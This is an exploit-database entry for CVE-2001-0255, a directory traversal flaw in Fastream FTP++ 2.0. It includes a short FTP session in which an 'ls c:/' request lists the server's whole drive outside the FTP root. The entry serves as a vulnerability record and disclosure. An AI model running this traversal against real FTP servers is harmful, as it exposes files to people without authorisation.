[] NeoSense
E X P L O I T S
title author type platform port cve id

fastream ftp++ 2.0 - Directory Traversal

Author: SNS Research
type: remote
platform: windows
port: 
date_added: 2001-01-22 
date_updated: 2012-08-17 
verified: 1 
codes: CVE-2001-0255;OSVDB-12103 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/2267/info

It is possible for a remote uesr to gain read permissions outside of the Faststream FTP++ Server directory. By requesting an 'ls' command along with the drive name, Fastream FTP++ will disclose the contents of the requested drive.

ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.

(listing of c:\)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.